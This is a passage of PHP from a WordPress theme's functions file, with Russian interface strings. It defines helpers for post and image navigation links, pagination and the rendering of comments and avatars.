			if (function_exists('wp_pagenavi')) { // http://wordpress.org/extend/plugins/wp-pagenavi/
				ob_start();
				wp_pagenavi();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			//posts
			$prev_link = get_previous_posts_link(__('Следующие записи <span class="meta-nav">&rarr;</span>', THEME_NS));
			$next_link = get_next_posts_link(__('<span class="meta-nav">&larr;</span> Предыдущие записи', THEME_NS));
		}
		$content = '';
		if ($prev_link || $next_link) {

			$content = <<<EOL
	<div class="navigation">
		<div class="alignleft">{$next_link}</div>
		<div class="alignright">{$prev_link}</div>
	 </div>
EOL;
		}
		if ($wrap) {
			theme_post_wrapper(array('content' => $content));	
		} else {
			echo $content;
		}
	}
}

if (!function_exists('theme_get_previous_post_link')){

	function theme_get_previous_post_link($format='&laquo; %link', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, true);
	}
}

if (!function_exists('theme_get_next_post_link')){
	function theme_get_next_post_link($format='%link &raquo;', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, false);
	}
}

if (!function_exists('theme_get_adjacent_image_link')){
	function theme_get_adjacent_image_link($prev = true, $size = 'thumbnail', $text = false) {
		global $post;
		$post = get_post($post);
		$attachments = array_values(get_children( array('post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID') ));

		foreach ( $attachments as $k => $attachment )
			if ( $attachment->ID == $post->ID )
				break;

		$k = $prev ? $k - 1 : $k + 1;

		if ( isset($attachments[$k]) )
			return wp_get_attachment_link($attachments[$k]->ID, $size, true, false, $text);
	}
}

if (!function_exists('theme_get_previous_image_link')){
	function theme_get_previous_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(true, $size, $text);
		if ($result) $result = '&laquo; ' . $result;
		return $result;
	}
}
	
if (!function_exists('theme_get_next_image_link')){
	function theme_get_next_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(false, $size, $text);
		if ($result) $result .= ' &raquo;';
		return $result;
	}
}

if (!function_exists('theme_get_adjacent_post_link')){
	function theme_get_adjacent_post_link($format, $link, $in_same_cat = false, $excluded_categories = '', $previous = true) {
		if ( $previous && is_attachment() )
			$post = & get_post($GLOBALS['post']->post_parent);
		else
			$post = get_adjacent_post($in_same_cat, $excluded_categories, $previous);

		if ( !$post )
			return;

		$title = $post->post_title;

		if ( empty($post->post_title) )
			$title = $previous ? __('Предыдущие записи', THEME_NS) : __('Следующие записи', THEME_NS);

		$title = apply_filters('the_title', $title, $post->ID);
		$short_title = $title;
		if (theme_get_option('theme_single_navigation_trim_title')) {
			$short_title = theme_trim_long_str($title, theme_get_option('theme_single_navigation_trim_len'));
		}
		$date = mysql2date(get_option('date_format'), $post->post_date);
		$rel = $previous ? 'prev' : 'next';

		$string = '<a href="'.get_permalink($post).'" title="'.esc_attr($title).'" rel="'.$rel.'">';
		$link = str_replace('%title', $short_title, $link);
		$link = str_replace('%date', $date, $link);
		$link = $string . $link . '</a>';

		$format = str_replace('%link', $link, $format);

		$adjacent = $previous ? 'previous' : 'next';
		return apply_filters( "{$adjacent}_post_link", $format, $link );
	}
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('theme_comment')){
	function theme_comment( $comment, $args, $depth ) {
		$GLOBALS['comment'] = $comment;
		
		
		switch ( $comment->comment_type ) :
		
			case '' :
		?>
		<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
			<?php ob_start(); ?>
			<div class="comment-author vcard">
				<?php echo theme_get_avatar(array('id' => $comment, 'size' => 48)); ?>
				<?php printf( __( '%s <span class="says">сказал:</span>', THEME_NS ), sprintf( '<cite class="fn">%s</cite>', get_comment_author_link() ) ); ?>
			</div>
			<?php if ( $comment->comment_approved == '0' ) : ?>
				<em><?php _e( 'Ваш комментарий ожидает модерации.', THEME_NS); ?></em>
				<br />
			<?php endif; ?>

			<div class="comment-meta commentmetadata"><a href="<?php echo esc_url( get_comment_link( $comment->comment_ID ) ); ?>">
				<?php
					printf( __( '%1$s - %2$s', THEME_NS ), get_comment_date(),  get_comment_time() ); ?></a><?php edit_comment_link( __( '(Редактировать)', THEME_NS), ' ' );
				?>
			</div>

			<div class="comment-body"><?php comment_text(); ?></div>

			<div class="reply">
				<?php comment_reply_link( array_merge( $args, array( 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
			</div>
			<?php theme_post_wrapper(array('content' => ob_get_clean(), 'id' => 'comment-'.get_comment_ID())); ?>


		<?php
				break;
			case 'pingback'  :
			case 'trackback' :
		?>
		<li class="post pingback">
		<?php ob_start(); ?>
			<p><?php _e( 'Ссылка:', THEME_NS ); ?> <?php comment_author_link(); ?><?php edit_comment_link( __('(Редактировать)', THEME_NS), ' ' ); ?></p>
		<?php theme_post_wrapper(array('content' => ob_get_clean(), 'class' => $comment->comment_type));
				break;
		endswitch;
	}
}

if (!function_exists('theme_get_avatar')){
	function theme_get_avatar($args = ''){
	$args = wp_parse_args($args, array('id' => false, 'size' => 96, 'default' => '', 'alt' => false, 'url' => false));
	extract($args);
		$result = get_avatar($id, $size, $default, $alt);
		if ($result) {
			if ($url){
				$result = '<a href="'.esc_url($url).'">' . $result . '</a>';
			}
			$result = '<div class="avatar">' . $result . '</div>';
		}
		return $result;
	}
}

if (!function_exists('get_post_format')){
	function get_post_format(){
		return false;
	}
}